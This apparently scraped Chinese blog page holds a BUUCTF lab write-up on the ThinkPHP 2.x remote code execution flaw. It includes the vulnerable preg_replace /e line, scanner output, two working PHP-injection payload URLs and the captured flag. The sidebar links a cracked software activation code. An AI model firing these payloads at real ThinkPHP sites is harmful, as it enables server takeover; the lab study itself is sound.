- 1one piece_娜美_01_one piece hentai
- 2CrossOver软件2023破解激活码_crossover-wine注册
- 3Spring Boot(四):Thymeleaf 使用详解_spring thymeleaf
- 4NX+Ubuntu18.04+ROS Realsense(RealSenseD435i )的安装与使用_realsense安装
- 5记录:rosdep update
- 6js通过a标签的方式下载文件并对其重命名的完整方案_a标签下载文件重命名
- 7JavaScript中的Array.prototype.forEach()方法(简介+重写)_js array.prototype.foreach
- 8leetcode 94 二叉树的中序遍历(java)_lecode中树的输入root = [1,null,3,2,4,null,5,6]是怎么转化成节点的
- 9R语言入门笔记2.1
- 10c#--正则表达式(项目常用)_c# 正则表达式 数字
BUUCTF-Real-[ThinkPHP]2-Rce1
赞
踩
任意代码执行漏洞
ThinkPHP 2.x版本中,使用
preg_replace的/e模式匹配路由:$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。
ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。
POC检测
- [15:05:31] [INFO] 检测到: thinkphp_lite_code_exec from script thinkphp_lite_code_exec.py, 目标: http://node5.buuoj.cn:27744/
- [15:05:31] [INFO] 正在检测 [29%/1][http://node5.buuoj.cn:27744] poc: thinkphp_pay_orderid_sqli
- [15:05:31] [INFO] 正在检测 [30%/1][http://node5.buuoj.cn:27744] poc: thinkphp_method_filter_code_exec
- [15:05:31] [INFO] 检测到: Thinkphp 2.x rce from script thinkphp2_rce.py, 目标: http://node5.buuoj.cn:27744/
经过poc检测,该版本的thinphp 2.x存在rce漏洞!
漏洞利用
----
[!] Name: thinkphp_lite_code_exec
Script: thinkphp_lite_code_exec.py
Url: http://node5.buuoj.cn:27744/
Vulnerable: True
Method: GET
Payload: http://node5.buuoj.cn:27744/index.php/module/action/param1/$%7B@print%28md5%282333%29%29%7D
[!] Name: Thinkphp 2.x rce
Script: thinkphp2_rce.py
Url: http://node5.buuoj.cn:27744/
Vulnerable: True
Attack: True
Method: GET
Payload: http://node5.buuoj.cn:27744/index.php?s=a/b/c/${var_dump(md5(1))}
----
http://node5.buuoj.cn:27744/index.php/module/action/param1/$%7B@print%28md5%282333%29%29%7Dhttp://node5.buuoj.cn:27744/index.php?s=a/b/c/${var_dump(md5(1))}
经过验证两个payload都可以使用!我们查看phpinfo页面!
get flag
自由组合payload,都可以触发代码执行漏洞!
flag{f2613e0d-5ccc-42d9-b18b-509dc185df9c}
- 相关标签
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。
